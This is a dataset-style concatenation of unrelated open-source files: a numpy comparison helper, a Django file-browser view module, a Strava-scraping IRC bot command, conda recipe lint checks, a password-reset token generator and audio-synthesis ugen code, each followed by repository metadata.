if rows == 0:
rows = v.size / cols
if cols == 0:
cols = v.size / rows
if v.ndim == 1:
v = v.reshape( ( rows , cols) )
# TODO: is this ever desirable?
elif (v.shape[0] != v.shape[1]) and v.shape[0] == cols and v.shape[1] == rows:
warnings.warn("Implicit use of transpose")
v = v.T
assert v.shape[1] == cols
assert v.shape[0] == rows
return v
def equivalent(a, b, A = "a", B = "b"):
olda = a
oldb = b
if type(a) == type(None):
warnings.warn("Ignoring null (return?) value for '%s'" % A)
return
if isinstance(a,np.bool_) and not isinstance(b,np.bool_):
if a:
a = 1
else:
a = 0
if isinstance(a,Number):
a = np.ones( (1,1) ).reshape((1,1)) * float(a)
if isinstance(b,Number):
b = np.ones( (1,1) ).reshape((1,1)) * float(b)
if type(a) != type(b):
# check if scalar before complaining
if type(a) == np.ndarray and len(a.shape):
if a.shape[0] == 1:
if len(a.shape) == 1:
a0 = a[0]
else:
a0 = a[0,0]
if float(a0) == float(b):
return
elif type(a) == list and type(b) == np.ndarray:
pass
elif isinstance(a,Number) and type(b) == np.ndarray:
# Compare a scalar with an array: start by converting
# a to a length-1 list
a = [a]
else:
raise Exception("class(%s) = %s and class(%s) = %s" % (A, type(a), B, type(b)))
if type(a) == np.ndarray:
# Meh. Fix up shapes
if len(a.shape) == 1 and len(b.shape) == 2:
if b.shape[0] == 1:
a = a.reshape( (1, a.shape[0]) )
elif b.shape[1] == 1:
a = a.reshape( (a.shape[0], 1) )
if len(b.shape) == 1 and len(a.shape) == 2:
if a.shape[0] == 1:
b = b.reshape( (1, b.shape[0]) )
elif a.shape[1] == 1:
b = b.reshape( (b.shape[0], 1) )
if len(a.shape) == 1 and len(b.shape) == 1:
a = a.reshape( (a.shape[0], 1) )
b = b.reshape( (b.shape[0], 1) )
if b.shape[1] == 0:
pdb.set_trace()
            b = np.ones((1, 1)) * float(b)  # ndarray.resize() returns None, so it cannot be chained here
if a.shape != b.shape:
raise Exception("size(%s) = %dx%d and size(%s) = %dx%d" % (A, a.shape[0], a.shape[1], B, b.shape[0], b.shape[1]))
delta = np.abs(a-b)
chk = delta > 1e-6
if chk.any():
errstr = "%s ~= %s\n%s\n%s" % (A, B, str(a), str(b))
raise Exception(errstr)
elif type(a) == dict:
for k in a.keys():
equivalent(a[k], b[k], A = "%s.%s" % (A, k), B = "%s.%s" % (B, k))
elif type(a) == list:
if len(a) != len(b):
raise Exception("len(%s) = %i and len(%s) = %i" % (A, len(a), B, len(b)))
for i in range(0, min(len(a), len(b))):
equivalent(a[i], b[i], A = "%s[%d]" % (A, i), B = "%s[%s]" % (B, i))
# raise Exception("Cannot check equivalence of %s (%s) and %s (%s)" % (A, type(a), B, type(b) ))
| mit | -7,945,160,460,626,821,000 | 29.759551 | 129 | 0.445262 | false |
vlegoff/tsunami | src/primaires/objet/types/viande.py | 1 | 1887 | # -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Fichier contenant le type viande."""
from .nourriture import Nourriture
class Viande(Nourriture):
"""Type d'objet: viande.
"""
nom_type = "viande"
def __init__(self, cle=""):
"""Constructeur de l'objet"""
Nourriture.__init__(self, cle)
self.nourrissant = 3
| bsd-3-clause | -6,479,407,128,384,047,000 | 40.933333 | 79 | 0.743508 | false |
WardBenjamin/FRCBuild | setup.py | 1 | 1637 | """
CLI Tool for building FIRST Robotics (FRC) C++ projects w/ WPILib
"""
from setuptools import find_packages, setup
dependencies = ['click']
setup(
name='frcbuild',
version='0.1.0',
url='https://github.com/WardBenjamin/frc-build',
license='BSD',
author='Benjamin Ward',
author_email='[email protected]',
description='CLI Tool for building FIRST Robotics (FRC) C++ projects w/ WPILib',
long_description=__doc__,
packages=find_packages(exclude=['tests']),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=dependencies,
entry_points={
'console_scripts': [
'frcbuild = frcbuild.cli:main',
],
},
classifiers=[
# As from http://pypi.python.org/pypi?%3Aaction=list_classifiers
# 'Development Status :: 1 - Planning',
# 'Development Status :: 2 - Pre-Alpha',
# 'Development Status :: 3 - Alpha',
'Development Status :: 4 - Beta',
# 'Development Status :: 5 - Production/Stable',
# 'Development Status :: 6 - Mature',
# 'Development Status :: 7 - Inactive',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Operating System :: POSIX',
'Operating System :: MacOS',
'Operating System :: Unix',
        'Operating System :: Microsoft :: Windows',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| gpl-2.0 | 2,587,404,946,052,572,700 | 33.104167 | 84 | 0.598045 | false |
phillc/django-filebrowser-fork | views.py | 1 | 20390 | # coding: utf-8
from django.shortcuts import render_to_response
from django.template import RequestContext as Context
from django.http import HttpResponseRedirect
from django.contrib.admin.views.decorators import staff_member_required
from django.views.decorators.cache import never_cache
from django.utils.translation import ugettext as _
from django.utils.safestring import mark_safe
from time import gmtime, strftime, localtime, mktime, time
import os, string, ftplib, re, Image, decimal
from django import forms
# get settings
from filebrowser.fb_settings import *
# get functions
from filebrowser.functions import _get_path, _get_subdir_list, _get_dir_list, _get_breadcrumbs, _get_sub_query, _get_query, _get_filterdate, _get_filesize, _make_filedict, _get_settings_var, _handle_file_upload, _get_file_type, _make_image_thumbnail, _image_generator, _image_crop_generator, _is_image_version
# get forms
from filebrowser.forms import MakeDirForm, RenameForm, UploadForm, BaseUploadFormSet
def index(request, dir_name=None):
"""
Show list of files on a server-directory.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
# INITIAL VARIABLES
results_var = {'results_total': 0, 'results_current': 0, 'delete_total': 0, 'change_total': 0, 'imagegenerator_total': 0 }
counter = {}
for k,v in EXTENSIONS.iteritems():
counter[k] = 0
dir_list = os.listdir(os.path.join(PATH_SERVER, path))
file_list = []
for file in dir_list:
# VARIABLES
var_filesize_long = '' # filesize
var_filesize_str = '' # filesize in B, kB, MB
var_date = '' # YYYY-MM-dd
var_path_thumb = '' # path to thumbnail
var_link = '' # link to file (using URL_WWW), link to folder (using URL_ADMIN)
var_select_link = '' # link to file (using URL_WWW)
var_file_extension = '' # see EXTENSIONS in fb_settings.py
var_file_type = '' # Folder, Image, Video, Document, Sound, Code, ...
var_image_dimensions = '' # Image Dimensions (width, height)
var_thumb_dimensions = '' # Thumbnail Dimensions (width, height)
var_flag_makethumb = False # True, if Image has no Thumbnail.
var_flag_deletedir = False # True, if Directory is empty.
var_image_version = False # True, if Image is generated with ImageGenerator.
# DON'T DISPLAY FILES STARTING WITH %THUMB_PREFIX% OR "."
if re.compile(THUMB_PREFIX, re.M).search(file) or \
        file.startswith('.'): # ... or with a '.'
continue
else:
results_var['results_total'] += 1
# SIZE
var_filesize_long = os.path.getsize(os.path.join(PATH_SERVER, path, file))
var_filesize_str = _get_filesize(var_filesize_long)
# DATE / TIME
date_time = os.path.getmtime(os.path.join(PATH_SERVER, path, file))
var_date = strftime("%Y-%m-%d", gmtime(date_time))
# EXTENSION / FLAG_EMPTYDIR / DELETE_TOTAL
if os.path.isfile(os.path.join(PATH_SERVER, path, file)): # file
var_file_extension = os.path.splitext(file)[1].lower()
var_select_link = var_link = "%s%s%s" % (URL_WWW, path, file)
elif os.path.isdir(os.path.join(PATH_SERVER, path, file)): # folder
var_link = "%s%s%s" % (URL_ADMIN, path, file)
var_select_link = "%s%s%s/" % (URL_WWW, path, file)
if not os.listdir(os.path.join(PATH_SERVER, path, file)):
var_flag_deletedir = True # only empty directories are allowed to be deleted
# FILETYPE / COUNTER
var_file_type = _get_file_type(file)
if var_file_type:
counter[var_file_type] += 1
# DIMENSIONS / MAKETHUMB / SELECT
if var_file_type == 'Image':
try:
im = Image.open(os.path.join(PATH_SERVER, path, file))
var_image_dimensions = im.size
var_path_thumb = "%s%s%s%s" % (URL_WWW, path, THUMB_PREFIX, file)
try:
thumb = Image.open(os.path.join(PATH_SERVER, path, THUMB_PREFIX + file))
var_thumb_dimensions = thumb.size
except:
# if thumbnail does not exist, show makethumb-Icon instead.
var_path_thumb = settings.URL_FILEBROWSER_MEDIA + 'img/filebrowser_Thumb.gif'
var_flag_makethumb = True
except:
# if image is corrupt, change filetype to not defined
var_file_type = ''
# check, if image is generated with ImageGenerator
var_image_version = _is_image_version(file)
if var_image_version == False:
results_var['imagegenerator_total'] += 1
# FILTER / SEARCH
flag_extend = False
if query['filter_type'] != '' and query['filter_date'] != '' and var_file_type == query['filter_type'] and _get_filterdate(query['filter_date'], date_time):
flag_extend = True
elif query['filter_type'] != '' and query['filter_date'] == '' and var_file_type == query['filter_type']:
flag_extend = True
elif query['filter_type'] == '' and query['filter_date'] != '' and _get_filterdate(query['filter_date'], date_time):
flag_extend = True
elif query['filter_type'] == '' and query['filter_date'] == '':
flag_extend = True
if query['q'] and not re.compile(query['q'].lower(), re.M).search(file.lower()):
flag_extend = False
# APPEND FILE_LIST
if flag_extend == True:
file_list.append([file, var_filesize_long, var_filesize_str, var_date, var_path_thumb, var_link, var_select_link, var_file_extension, var_file_type, var_image_dimensions, var_thumb_dimensions, file.lower(), var_flag_makethumb, var_flag_deletedir, var_image_version])
# SORT LIST
file_list.sort(lambda x, y: cmp(x[int(query['o'])], y[int(query['o'])]))
if query['ot'] == "desc":
file_list.reverse()
# MAKE DICTIONARY (for better readability in the templates)
file_dict = _make_filedict(file_list)
# RESULTS
results_var['results_current'] = len(file_list)
for file in file_dict:
if file['file_type'] == 'Image':
results_var['change_total'] += 1
if file['file_type'] != 'Folder':
results_var['delete_total'] += 1
elif file['file_type'] == 'Folder' and file['flag_deletedir'] == True:
results_var['delete_total'] += 1
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'file_dict': file_dict,
'results_var': results_var,
'query': query,
'counter': counter,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'title': _('FileBrowser'),
'root_path': URL_HOME,
}, context_instance=Context(request))
index = staff_member_required(never_cache(index))
def mkdir(request, dir_name=None):
"""
Make directory
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if request.method == 'POST':
form = MakeDirForm(PATH_SERVER, path, request.POST)
if form.is_valid():
server_path = os.path.join(PATH_SERVER, path, form.cleaned_data['dir_name'].lower())
try:
os.mkdir(server_path)
os.chmod(server_path, 0775)
# MESSAGE & REDIRECT
msg = _('The directory %s was successfully created.') % (form.cleaned_data['dir_name'].lower())
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new directory on top of the list
return HttpResponseRedirect(URL_ADMIN + path + "?&ot=desc&o=3&" + query['pop'])
except OSError, (errno, strerror):
if errno == 13:
form.errors['dir_name'] = forms.util.ErrorList([_('Permission denied.')])
else:
form.errors['dir_name'] = forms.util.ErrorList([_('Error creating directory.')])
else:
form = MakeDirForm(PATH_SERVER, path)
return render_to_response('filebrowser/makedir.html', {
'form': form,
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, 'Make Directory'),
'title': _('Make directory'),
'root_path': URL_HOME,
}, context_instance=Context(request))
mkdir = staff_member_required(never_cache(mkdir))
def upload(request, dir_name=None):
"""
Multipe Upload.
"""
from django.forms.formsets import formset_factory
path = _get_path(dir_name)
query = _get_query(request.GET)
# PIL's Error "Suspension not allowed here" work around:
# s. http://mail.python.org/pipermail/image-sig/1999-August/000816.html
import ImageFile
ImageFile.MAXBLOCK = IMAGE_MAXBLOCK # default is 64k
UploadFormSet = formset_factory(UploadForm, formset=BaseUploadFormSet, extra=5)
if request.method == 'POST':
formset = UploadFormSet(data=request.POST, files=request.FILES, path_server=PATH_SERVER, path=path)
if formset.is_valid():
for cleaned_data in formset.cleaned_data:
if cleaned_data:
# UPLOAD FILE
_handle_file_upload(PATH_SERVER, path, cleaned_data['file'])
if _get_file_type(cleaned_data['file'].name) == "Image":
# MAKE THUMBNAIL
_make_image_thumbnail(PATH_SERVER, path, cleaned_data['file'].name)
# IMAGE GENERATOR
if FORCE_GENERATOR or (cleaned_data['use_image_generator'] and (IMAGE_GENERATOR_LANDSCAPE != "" or IMAGE_GENERATOR_PORTRAIT != "")):
_image_generator(PATH_SERVER, path, cleaned_data['file'].name)
# GENERATE CROPPED/RECTANGULAR IMAGE
if FORCE_GENERATOR or (cleaned_data['use_image_generator'] and IMAGE_CROP_GENERATOR != ""):
_image_crop_generator(PATH_SERVER, path, cleaned_data['file'].name)
# MESSAGE & REDIRECT
msg = _('Upload successful.')
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the uploaded files on top of the list
redirect_url = URL_ADMIN + path + "?&ot=desc&o=3&" + query['pop']
return HttpResponseRedirect(redirect_url)
else:
formset = UploadFormSet(path_server=PATH_SERVER, path=path)
return render_to_response('filebrowser/upload.html', {
'formset': formset,
'dir': dir_name,
'query': _get_query(request.GET),
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, 'Multiple Upload'),
'title': _('Select files to upload'),
'root_path': URL_HOME,
}, context_instance=Context(request))
upload = staff_member_required(never_cache(upload))
def makethumb(request, dir_name=None, file_name=None):
"""
Make Thumbnail(s) for existing Image or Directory
This is useful if someone uploads images via FTP, not using the
upload functionality of the FileBrowser.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if file_name:
# MAKE THUMB FOR SINGLE IMAGE
file_path = os.path.join(PATH_SERVER, path, file_name)
if os.path.isfile(file_path):
_make_image_thumbnail(PATH_SERVER, path, file_name)
else:
# MAKE THUMBS FOR WHOLE DIRECTORY
dir_path = os.path.join(PATH_SERVER, path)
dir_list = os.listdir(dir_path)
for file in dir_list:
if os.path.isfile(os.path.join(PATH_SERVER, path, file)) and not os.path.isfile(os.path.join(PATH_SERVER, path, THUMB_PREFIX + file)) and not re.compile(THUMB_PREFIX, re.M).search(file) and _get_file_type(file) == "Image":
_make_image_thumbnail(PATH_SERVER, path, file)
# MESSAGE & REDIRECT
msg = _('Thumbnail creation successful.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_str_total'])
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'root_path': URL_HOME,
}, context_instance=Context(request))
makethumb = staff_member_required(never_cache(makethumb))
def delete(request, dir_name=None):
"""
Delete existing File/Directory.
If file is an Image, also delete thumbnail.
When trying to delete a directory, the directory has to be empty.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
msg = ""
if request.GET:
if request.GET.get('type') != "Folder":
server_path = os.path.join(PATH_SERVER, path, request.GET.get('filename'))
try:
# DELETE FILE
os.unlink(server_path)
# TRY DELETING THUMBNAIL
path_thumb = os.path.join(PATH_SERVER, path, THUMB_PREFIX + request.GET.get('filename'))
try:
os.unlink(path_thumb)
except OSError:
pass
# TRY DELETING IMAGE_VERSIONS
versions_path = os.path.join(PATH_SERVER, path, request.GET.get('filename').replace(".", "_").lower() + IMAGE_GENERATOR_DIRECTORY)
try:
dir_list = os.listdir(versions_path)
for file in dir_list:
file_path = os.path.join(versions_path, file)
os.unlink(file_path)
os.rmdir(versions_path)
except OSError:
pass
# MESSAGE & REDIRECT
msg = _('The file %s was successfully deleted.') % (request.GET.get('filename').lower())
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_nodelete'])
except OSError:
# todo: define error message
msg = OSError
else:
server_path = os.path.join(PATH_SERVER, path, request.GET.get('filename'))
try:
os.rmdir(server_path)
# MESSAGE & REDIRECT
msg = _('The directory %s was successfully deleted.') % (request.GET.get('filename').lower())
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_nodelete'])
except OSError:
# todo: define error message
msg = OSError
if msg:
request.user.message_set.create(message=msg)
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'file': request.GET.get('filename', ''),
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'root_path': URL_HOME,
}, context_instance=Context(request))
delete = staff_member_required(never_cache(delete))
def rename(request, dir_name=None, file_name=None):
"""
Rename existing File/Directory.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if os.path.isfile(os.path.join(PATH_SERVER, path, file_name)): # file
file_type = _get_file_type(file_name)
file_extension = os.path.splitext(file_name)[1].lower()
else:
file_extension = ""
file_type = ""
if request.method == 'POST':
form = RenameForm(PATH_SERVER, path, file_extension, request.POST)
if form.is_valid():
old_path = os.path.join(PATH_SERVER, path, file_name)
new_path = os.path.join(PATH_SERVER, path, request.POST.get('name').lower() + file_extension)
try:
os.rename(old_path, new_path)
# RENAME IMAGE_THUMBNAILS
if file_type == 'Image':
old_thumb_path = os.path.join(PATH_SERVER, path, THUMB_PREFIX + file_name)
new_thumb_path = os.path.join(PATH_SERVER, path, THUMB_PREFIX + request.POST.get('name').lower() + file_extension)
try:
os.rename(old_thumb_path, new_thumb_path)
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error renaming Thumbnail.')])
# RENAME IMAGE VERSIONS? TOO MUCH MAGIC?
# MESSAGE & REDIRECT
if not form.errors:
msg = _('Renaming was successful.')
request.user.message_set.create(message=msg)
# on redirect, sort by date desc to see the new stuff on top of the list
return HttpResponseRedirect(URL_ADMIN + path + "?&ot=desc&o=3&" + query['pop'])
except OSError, (errno, strerror):
form.errors['name'] = forms.util.ErrorList([_('Error.')])
else:
form = RenameForm(PATH_SERVER, path, file_extension)
return render_to_response('filebrowser/rename.html', {
'form': form,
'query': query,
'file_extension': file_extension,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, 'Rename'),
'title': _('Rename "%s"') % file_name,
'root_path': URL_HOME,
}, context_instance=Context(request))
rename = staff_member_required(never_cache(rename))
def generateimages(request, dir_name=None, file_name=None):
"""
Generate Image Versions for existing singe Image or a whole Directory.
This is useful if someone uploads images via FTP, not using the
upload functionality of the FileBrowser.
"""
path = _get_path(dir_name)
query = _get_query(request.GET)
if file_name:
# GENERATE IMAGES
if IMAGE_GENERATOR_LANDSCAPE != "" or IMAGE_GENERATOR_PORTRAIT != "":
_image_generator(PATH_SERVER, path, file_name)
# GENERATE CROPPED/RECTANGULAR IMAGE
if IMAGE_CROP_GENERATOR != "":
_image_crop_generator(PATH_SERVER, path, file_name)
else:
# GENERATE IMAGES FOR WHOLE DIRECTORY
dir_path = os.path.join(PATH_SERVER, path)
dir_list = os.listdir(dir_path)
for file in dir_list:
if os.path.isfile(os.path.join(PATH_SERVER, path, file)) and not re.compile(THUMB_PREFIX, re.M).search(file) and _get_file_type(file) == "Image":
# GENERATE IMAGES
if IMAGE_GENERATOR_LANDSCAPE != "" or IMAGE_GENERATOR_PORTRAIT != "":
_image_generator(PATH_SERVER, path, file)
# GENERATE CROPPED/RECTANGULAR IMAGE
if IMAGE_CROP_GENERATOR != "":
_image_crop_generator(PATH_SERVER, path, file)
# MESSAGE & REDIRECT
msg = _('Successfully generated Images.')
request.user.message_set.create(message=msg)
return HttpResponseRedirect(URL_ADMIN + path + query['query_str_total'])
return render_to_response('filebrowser/index.html', {
'dir': dir_name,
'query': query,
'settings_var': _get_settings_var(request.META['HTTP_HOST'], path),
'breadcrumbs': _get_breadcrumbs(_get_query(request.GET), dir_name, ''),
'root_path': URL_HOME,
}, context_instance=Context(request))
generateimages = staff_member_required(never_cache(generateimages))
| bsd-3-clause | -4,157,568,425,170,416,600 | 43.714912 | 309 | 0.582688 | false |
Dev-Cloud-Platform/Dev-Cloud | dev_cloud/cc1/src/clm/utils/tokens.py | 1 | 2164 | # -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
"""@package src.clm.utils.tokens
@author Piotr Wójcik
@date 21.09.2010
"""
from django.utils.http import int_to_base36, base36_to_int
class PasswordResetTokenGenerator(object):
"""
Class for generating tokens during password reset.
"""
def make_token(self, user):
"""
@parameter{user,User} instance of the User whom Token should be
generated for
@returns{string} Token with timestamp generated for specified User
"""
import hashlib
h = hashlib.sha1(user.password +
unicode(user.last_login_date) +
unicode(user.id)).hexdigest()[::2]
return "%s-%s" % (int_to_base36(user.id), h)
def check_token(self, user, token):
"""
@parameter{user,User} instance of the User whose Token should be
checked.
@parameter{token,string} Token to check
@returns{bool} @val{true} for right Token, @val{false} for wrong Token
"""
try:
ts_b36 = token.split("-")[0]
except ValueError:
return False
try:
uid = base36_to_int(ts_b36)
except ValueError:
return False
# Check that the uid has not been tampered with
if uid != user.id:
return False
if self.make_token(user) != token:
return False
return True
default_token_generator = PasswordResetTokenGenerator()
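# Usage sketch (illustrative; any object exposing ``password``, ``last_login_date``
# and ``id`` can stand in for the CLM user model):
#
#   token = default_token_generator.make_token(user)      # e.g. "2c-1a2b3c..."
#   default_token_generator.check_token(user, token)      # -> True
#   default_token_generator.check_token(user, "2c-0000")  # -> False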
| apache-2.0 | -4,509,081,930,120,977,400 | 27.84 | 78 | 0.626445 | false |
bioconda/bioconda-utils | bioconda_utils/lint/check_noarch.py | 1 | 4912 | """Use of ``noarch`` and ``skip``
When to use ``noarch`` and when to use ``skip`` or pin the interpreter
is non-intuitive and idiosyncratic due to ``conda`` legacy
behavior. These checks aim at getting the right settings.
"""
import re
from . import LintCheck, ERROR, WARNING, INFO
# Noarch or not checks:
#
# - Python packages that use no compiler should be
# a) Marked ``noarch: python``
# b) Not use ``skip: True # [...]`` except for osx/linux,
# but use ``- python [<>]3``
# - Python packages that use a compiler should be
# a) NOT marked ``noarch: python``
# b) Not use ``- python [<>]3``,
# but use ``skip: True # [py[23]k]``
class should_be_noarch_python(LintCheck):
"""The recipe should be build as ``noarch``
Please add::
build:
noarch: python
Python packages that don't require a compiler to build are
normally architecture independent and go into the ``noarch``
subset of packages.
"""
def check_deps(self, deps):
if 'python' not in deps:
return # not a python package
if all('build' not in loc for loc in deps['python']):
return # only uses python in run/host
if any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/noarch', None) == 'python':
return # already marked noarch: python
self.message(section='build', data=True)
def fix(self, _message, _data):
self.recipe.set('build/noarch', 'python')
return True
class should_be_noarch_generic(LintCheck):
"""The recipe should be build as ``noarch``
Please add::
build:
noarch: generic
Packages that don't require a compiler to build are normally
architecture independent and go into the ``noarch`` subset of
packages.
"""
requires = ['should_be_noarch_python']
def check_deps(self, deps):
if any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/noarch', None):
return # already marked noarch
self.message(section='build', data=True)
def fix(self, _message, _data):
self.recipe.set('build/noarch', 'generic')
return True
class should_not_be_noarch_compiler(LintCheck):
"""The recipe uses a compiler but is marked noarch
Recipes using a compiler should not be marked noarch.
Please remove the ``build: noarch:`` section.
"""
def check_deps(self, deps):
if not any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/noarch', False) is False:
return # no noarch, or noarch=False
self.message(section='build/noarch')
class should_not_be_noarch_skip(LintCheck):
"""The recipe uses ``skip: True`` but is marked noarch
Recipes marked as ``noarch`` cannot use skip.
"""
def check_recipe(self, recipe):
if self.recipe.get('build/noarch', False) is False:
return # no noarch, or noarch=False
if self.recipe.get('build/skip', False) is False:
return # no skip or skip=False
self.message(section='build/noarch')
class should_not_use_skip_python(LintCheck):
"""The recipe should be noarch and not use python based skipping
Please use::
requirements:
build:
- python >3 # or <3
run:
- python >3 # or <3
The ``build: skip: True`` feature only works as expected for
packages built specifically for each "platform" (i.e. Python
version and OS). This package should be ``noarch`` and not use
skips.
"""
bad_skip_terms = ('py2k', 'py3k', 'python')
def check_deps(self, deps):
if 'python' not in deps:
return # not a python package
if any(dep.startswith('compiler_') for dep in deps):
return # not compiled
if self.recipe.get('build/skip', None) is None:
return # no build: skip: section
skip_line = self.recipe.get_raw('build/skip')
if not any(term in skip_line for term in self.bad_skip_terms):
return # no offending skip terms
self.message(section='build/skip')
class should_not_be_noarch_source(LintCheck):
"""The recipe uses per platform sources and cannot be noarch
You are downloading different upstream sources for each
platform. Remove the noarch section or use just one source for all
platforms.
"""
_pat = re.compile(r'# +\[.*\]')
def check_source(self, source, section):
if self.recipe.get('build/noarch', False) is False:
return # no noarch, or noarch=False
# just search the entire source entry for a comment
if self._pat.search(self.recipe.get_raw(f"{section}")):
self.message(section)
| mit | 7,150,494,295,863,050,000 | 30.487179 | 70 | 0.617875 | false |
normcyr/sopel-modules | strava.py | 1 | 1773 | #!/usr/bin/python3
'''
strava.py - strava activity module
author: Norm1 <[email protected]>
found here: https://github.com/normcyr/sopel-modules
'''
import requests
from bs4 import BeautifulSoup
from sopel.module import commands, example
def fetch_new_activity(url):
r = requests.get(url)
if r.status_code == 200:
return(r)
else:
print('URL error')
def make_soup(r):
soup = BeautifulSoup(r.text, 'html.parser')
return(soup)
def retreive_activity_info(soup):
athlete_name = soup.find('h2', {'class': 'bottomless'}).text.strip()
activity_title = soup.find('div', {'class': 'hgroup'}).text.strip()
activity_type = soup.find('div', {'class': 'activity-type-date'}).find('strong').text.strip()
activity_distance = soup.find('li', {'class': 'distance'}).find('strong').text.strip()
activity_info = {'Name': athlete_name, 'Title': activity_title, 'Type': activity_type, 'Distance': activity_distance}
return(activity_info)
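# Illustrative return value (actual strings depend on Strava's page markup at scrape
# time; the values below are made up):
#
#   {'Name': 'Jane Doe', 'Title': 'Morning Ride', 'Type': 'Ride', 'Distance': '25.3km'}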
@commands('strava')
@example('.strava https://www.strava.com/activities/1474462480')
def strava(bot, trigger):
    '''.strava <activity_url> - Retrieve the Strava data from an activity. This assumes that the activity is public.'''
url = trigger.group(2)
#url = 'https://www.strava.com/activities/1474462480'
try:
r = fetch_new_activity(url)
soup = make_soup(r)
activity_info = retreive_activity_info(soup)
bot.say('{} just did a {} {}.'.format(activity_info['Name'], activity_info['Distance'], activity_info['Type']))
#print('{} just did a {} {}.'.format(activity_info['Name'], activity_info['Distance'], activity_info['Type']))
    except Exception:
        return bot.say("Could not retrieve activity data from that URL")
#if __name__ == '__main__':
#strava()
| gpl-3.0 | -6,875,788,661,379,818,000 | 29.568966 | 121 | 0.64467 | false |
andrewyoung1991/supriya | supriya/tools/ugentools/Lag3UD.py | 1 | 4787 | # -*- encoding: utf-8 -*-
from supriya.tools.synthdeftools.CalculationRate import CalculationRate
from supriya.tools.ugentools.Filter import Filter
class Lag3UD(Filter):
r'''An up/down exponential lag generator.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud
Lag3UD.ar()
'''
### CLASS VARIABLES ###
__documentation_section__ = 'Filter UGens'
__slots__ = ()
_ordered_input_names = (
'source',
'lag_time_u',
'lag_time_d',
)
_valid_rates = (
CalculationRate.AUDIO,
CalculationRate.CONTROL,
)
### INITIALIZER ###
def __init__(
self,
calculation_rate=None,
lag_time_d=0.1,
lag_time_u=0.1,
source=None,
):
Filter.__init__(
self,
calculation_rate=calculation_rate,
lag_time_d=lag_time_d,
lag_time_u=lag_time_u,
source=source,
)
### PUBLIC METHODS ###
@classmethod
def ar(
cls,
lag_time_d=0.1,
lag_time_u=0.1,
source=None,
):
r'''Constructs an audio-rate Lag3UD.
::
>>> source = ugentools.In.ar(bus=0)
>>> lag_3_ud = ugentools.Lag3UD.ar(
... lag_time_d=0.1,
... lag_time_u=0.1,
... source=source,
... )
>>> lag_3_ud
Lag3UD.ar()
Returns ugen graph.
'''
from supriya.tools import synthdeftools
